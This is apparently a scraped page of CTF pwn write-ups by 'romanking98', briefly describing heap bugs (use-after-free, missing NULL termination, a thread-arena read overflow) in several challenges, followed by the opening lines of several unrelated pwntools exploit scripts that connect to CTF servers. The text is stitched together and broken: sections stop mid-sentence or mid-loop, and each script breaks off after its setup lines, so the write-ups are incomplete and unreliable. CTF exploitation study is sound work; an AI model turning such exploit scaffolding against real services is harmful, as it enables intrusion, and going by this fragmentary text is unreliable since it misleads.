romanking98

Stringer (18 solves)

Challenge from RCTF, prequals to XCTF.

Bugs

There are 2 bugs in the program : the first is an obvious UAF. The second is no NULL termination immediately after our input, allowing us to leak. NULL byte terminates at buf + size - 1, read loop breaks if buf == "\n"

However, leaking is tricky since program uses calloc, which sets the newly allocated heap chunk to 0x00.

GoGoGadget (1 solve)

Tool credits : @scwuaptx, pwngdb for making public awesome malloc research

Layout

*------------------------------*
 Hi Inspector!

NULL ( 17-18 solves)

Challenge makes a thread to do the job. So , a thread_arena is created on a new mmap_segment.

Bug

Overflow in read function :

 for ( i = 0LL; ; i += v3 )
 {

	#!/usr/bin/python
	from pwn import *

	elf = ELF("./libc-2.23.so")
	#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
	r = remote('sapeloshop.teaser.insomnihack.ch', 80)
	#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
	raw_input()

	i = int("3d714", 16)

	#!/usr/bin/python
	from pwn import *

	p = remote("35.198.130.245", 1337)
	#p = process("./readme_revenge")
	raw_input()

	#name = "A"*920
	name = p64(0x00) # Pass NULL Check.
	name += "XXXX"

	#!/usr/bin/python
	from pwn import *

	elf = ELF("./libc-2.23.so")
	p = remote("159.203.116.12", 8888)
	#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})
	raw_input()

	def menu():
	p.recvuntil(">")

	#!/usr/bin/python
	from pwn import *

	rol1 = lambda val, r_bits, max_bits: \
	(val << r_bits%max_bits) & (2**max_bits-1) \| \
	((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

	ror1 = lambda val, r_bits, max_bits: \
	((val & (2**max_bits-1)) >> r_bits%max_bits) \| \
	(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

	#!/usr/bin/python
	from pwn import *

	p = remote("secure_keymanager.pwn.seccon.jp",47225)
	#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"})
	raw_input()

	def menu():
	p.recvuntil(">>")